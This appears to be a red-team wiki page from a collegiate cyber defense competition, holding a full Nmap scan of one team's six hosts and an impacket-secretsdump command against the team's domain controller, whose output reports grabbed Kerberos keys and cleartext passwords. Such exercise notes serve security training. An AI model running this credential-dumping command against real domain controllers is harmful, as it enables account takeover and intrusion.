Team 3 Wiki Page

Team Information
Number: Team 3
Name: The Notorious Scoundrels
IP Range: 201.203.200.0/24
Domain: team3.isucdc.com
Current Place: 5th
Red Teamer(s): None
Service Status
AD LDAP
AD RDP
JD RDP
LTV SSH
NEWS SSH
NEWS HTTP
WSTN SSH
WSTN MQTT
WWW SSH
WWW HTTP
Nmap
# Nmap 7.93 scan initiated Sat Oct  4 09:56:37 2025 as: "C:\\Program Files (x86)\\Nmap\\nmap.exe" -A -sV -p- -iL "C:\\Users\\Benjamin Merz\\Documents\\ISUCDC_hostname_list3.txt" -o "C:\\Users\\Benjamin Merz\\Documents\\Team2"
Nmap scan report for ad.team3.isucdc.com (201.203.200.10)
Host is up (0.015s latency).
Not shown: 65507 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-04 15:00:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: TEAM3
|   NetBIOS_Domain_Name: TEAM3
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: team3.isucdc.com
|   DNS_Computer_Name: ad.team3.isucdc.com
|   DNS_Tree_Name: team3.isucdc.com
|   Product_Version: 10.0.17763
|_  System_Time: 2025-10-04T15:02:48+00:00
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Not valid before: 2025-09-05T01:19:40
|_Not valid after:  2026-03-07T01:19:40
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
59258/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-04T15:02:49
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

TRACEROUTE (using port 135/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 201.203.200.30
2   1.00 ms 201.203.200.10

Nmap scan report for jd.team3.isucdc.com (201.203.200.20)
Host is up (0.018s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: TEAM3
|   NetBIOS_Domain_Name: TEAM3
|   NetBIOS_Computer_Name: JD
|   DNS_Domain_Name: team3.isucdc.com
|   DNS_Computer_Name: jd.team3.isucdc.com
|   DNS_Tree_Name: team3.isucdc.com
|   Product_Version: 10.0.22621
|_  System_Time: 2025-10-04T15:02:49+00:00
| ssl-cert: Subject: commonName=jd.team3.isucdc.com
| Not valid before: 2025-09-07T16:21:44
|_Not valid after:  2026-03-09T16:21:44
|_ssl-date: TLS randomness does not represent time
5040/tcp  open  unknown
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
49673/tcp open  msrpc              Microsoft Windows RPC
49674/tcp open  msrpc              Microsoft Windows RPC
49714/tcp open  msrpc              Microsoft Windows RPC
49719/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10 (90%)
OS CPE: cpe:/o:microsoft:windows_10:1703
Aggressive OS guesses: Microsoft Windows 10 1703 (90%), Microsoft Windows 10 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-04T15:02:56
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s

TRACEROUTE (using port 135/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 201.203.200.30
2   1.00 ms 201.203.200.20

Nmap scan report for ltv.team3.isucdc.com (201.203.200.30)
Host is up (0.016s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 0c7c02eb5a9fe29566c11e06cf84cf47 (DSA)
|   2048 453739b58fc6b978ab1e41dd81596ecf (RSA)
|   256 89e9f14ac8d9391f078dd4603c19c4dd (ECDSA)
|_  256 58de7185954051643b9ee99cebfdf838 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (91%), Linksys EA3500 WAP (91%), Linux 3.13 (89%), Linux 3.16 (89%), Linux 3.16 - 4.6 (88%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%), Android 5.0 - 6.0.1 (Linux 3.4) (87%), Linux 2.6.32 (87%), Linux 2.6.32 - 3.10 (86%), Linux 3.10 - 4.11 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
1   1.00 ms 12.110.254.254
2   1.00 ms 201.203.200.30

Nmap scan report for news.team3.isucdc.com (201.203.200.40)
Host is up (0.022s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 357994a98dd506f35bb6c7317962de08 (RSA)
|   256 95a6a90f800410e48ba00b686b3907e8 (ECDSA)
|_  256 9578e1eedc0ef62ba30dddaae08fa7cd (ED25519)
80/tcp   open   http       Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp  closed https
8080/tcp open   http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Disposition: inline;filename=f.txt
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:39 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:38.952+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:38 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:38.841+00:00","status":404,"error":"Not Found","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:38 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:38.876+00:00","status":404,"error":"Not Found","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 04 Oct 2025 15:01:38 GMT
|     Connection: close
|     HTTP Status 400
|     Request body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;} HTTP Status 400
|     Request
|   Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 04 Oct 2025 15:01:39 GMT
|     Connection: close
|     HTTP Status 400
|     Request body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;} HTTP Status 400
|_    Request
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Device type: general purpose|proxy server|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (92%), WebSense embedded (86%), Synology DiskStation Manager 5.X (85%), Netgear RAIDiator 4.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.6 (92%), Linux 5.0 - 5.3 (91%), Linux 5.0 - 5.4 (88%), Linux 5.4 (88%), Linux 2.6.32 (88%), Linux 3.2 - 4.9 (88%), Linux 2.6.32 - 3.10 (87%), Linux 5.3 - 5.4 (87%), Linux 3.4 - 3.10 (86%), Websense Content Gateway (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 201.203.200.30
2   1.00 ms 201.203.200.40

Nmap scan report for wstn.team3.isucdc.com (201.203.200.50)
Host is up (0.0011s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE                  VERSION
22/tcp   open  ssh                      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 5a185df5ed7864cc5387404bb610863a (RSA)
|   256 e474126041a3534067eeeadac542e3fd (ECDSA)
|_  256 0799db383afe5abafc5c27c9ea83c3c5 (ED25519)
1883/tcp open  mosquitto version 2.0.11
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/load/sockets/1min: 1.76
|     $SYS/broker/heap/maximum: 43896
|     $SYS/broker/publish/messages/sent: 61
|     $SYS/broker/bytes/sent: 2502
|     $SYS/broker/heap/current: 43392
|     $SYS/broker/messages/sent: 63
|     $SYS/broker/clients/connected: 1
|     $SYS/broker/load/sockets/5min: 0.61
|     $SYS/broker/store/messages/bytes: 151
|     $SYS/broker/load/bytes/sent/5min: 238.35
|     $SYS/broker/clients/maximum: 1
|     $SYS/broker/load/messages/received/15min: 0.20
|     $SYS/broker/uptime: 9504 seconds
|     $SYS/broker/load/bytes/received/15min: 4.54
|     $SYS/broker/clients/total: 1
|     $SYS/broker/load/messages/received/5min: 0.58
|     $SYS/broker/load/bytes/sent/15min: 80.43
|     $SYS/broker/messages/stored: 33
|     $SYS/broker/load/connections/5min: 0.38
|     $SYS/broker/store/messages/count: 33
|     $SYS/broker/load/connections/15min: 0.13
|     $SYS/broker/clients/active: 1
|     $SYS/broker/load/publish/sent/1min: 28.32
|     $SYS/broker/subscriptions/count: 2
|     $SYS/broker/load/sockets/15min: 0.34
|     $SYS/broker/version: mosquitto version 2.0.11
|     $SYS/broker/retained messages/count: 36
|     $SYS/broker/publish/bytes/sent: 263
|     $SYS/broker/load/messages/received/1min: 2.46
|     $SYS/broker/load/bytes/received/1min: 58.00
|     $SYS/broker/messages/received: 3
|     $SYS/broker/load/publish/sent/5min: 6.09
|     $SYS/broker/load/messages/sent/1min: 30.78
|     $SYS/broker/load/publish/sent/15min: 2.05
|     $SYS/broker/load/messages/sent/5min: 6.66
|     $SYS/broker/load/bytes/sent/1min: 1108.09
|     $SYS/broker/load/connections/1min: 1.55
|     $SYS/broker/load/bytes/received/5min: 13.30
|     $SYS/broker/bytes/received: 69
|_    $SYS/broker/load/messages/sent/15min: 2.25
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 4.15 - 5.6 (91%), Linux 5.0 - 5.3 (90%), Linux 5.0 - 5.4 (87%), Linux 5.4 (87%), Linux 2.6.32 (87%), Linux 3.2 - 4.9 (87%), Linux 2.6.32 - 3.10 (86%), Linux 5.3 - 5.4 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 201.203.200.30
2   1.00 ms 201.203.200.50

Nmap scan report for www.team3.isucdc.com (201.203.200.60)
Host is up (0.0011s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE VERSION
22/tcp   open   ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 a06a89c7a4b137232d3aa124c3761006 (ECDSA)
|_  256 a87c353ddf2b92072b1ec85a8dd37e0f (ED25519)
80/tcp   open   http    Apache httpd 2.4.65 ((Debian))
|_http-server-header: Apache/2.4.65 (Debian)
|_http-title: Arrow pointing to the left
443/tcp  closed https
3000/tcp open   ppp?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     content-type: text/html;charset=utf-8
|     x-powered-by: Nuxt
|     Date: Sat, 04 Oct 2025 15:06:15 GMT
|     Connection: close
|     <!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><style id="nuxt-ui-colors">@layer base {
|     :root {
|     --ui-color-primary-50: var(--color-green-50, oklch(98.2% 0.018 155.826));
|     --ui-color-primary-100: var(--color-green-100, oklch(96.2% 0.044 156.743));
|     --ui-color-primary-200: var(--color-green-200, oklch(92.5% 0.084 155.995));
|     --ui-color-primary-300: var(--color-green-300, oklch(87.1% 0.15 154.449));
|     --ui-color-primary-400: var(--color-green-400, oklch(79.2% 0.209 151.711));
|     --ui-color-primary-500: var(--color-green-500, oklch(72.3% 0.219 149.579));
|     --ui-color-primary-600: var(--color-green-600, oklch(62.7% 0.194 149.214));
|     --ui-color-primary-700: var(--color-green-700, oklch(
|   Help, NCP: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Device type: general purpose|proxy server|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (92%), WebSense embedded (85%), Synology DiskStation Manager 5.X (85%), Netgear RAIDiator 4.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.6 (92%), Linux 5.0 - 5.3 (90%), Linux 2.6.32 (88%), Linux 3.2 - 4.9 (88%), Linux 5.0 - 5.4 (87%), Linux 2.6.32 - 3.10 (87%), Linux 5.3 - 5.4 (87%), Linux 5.4 (87%), Linux 3.4 - 3.10 (86%), Websense Content Gateway (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 201.203.200.30
2   1.00 ms 201.203.200.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct  4 10:06:45 2025 -- 6 IP addresses (6 hosts up) scanned in 607.84 seconds

Notable Vulnerabilities
impacket-secretsdump 'AD$'@ad.team3.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] ClearText passwords grabbed
[*] Cleaning up...


Notable Defenses
Team Spirit Issues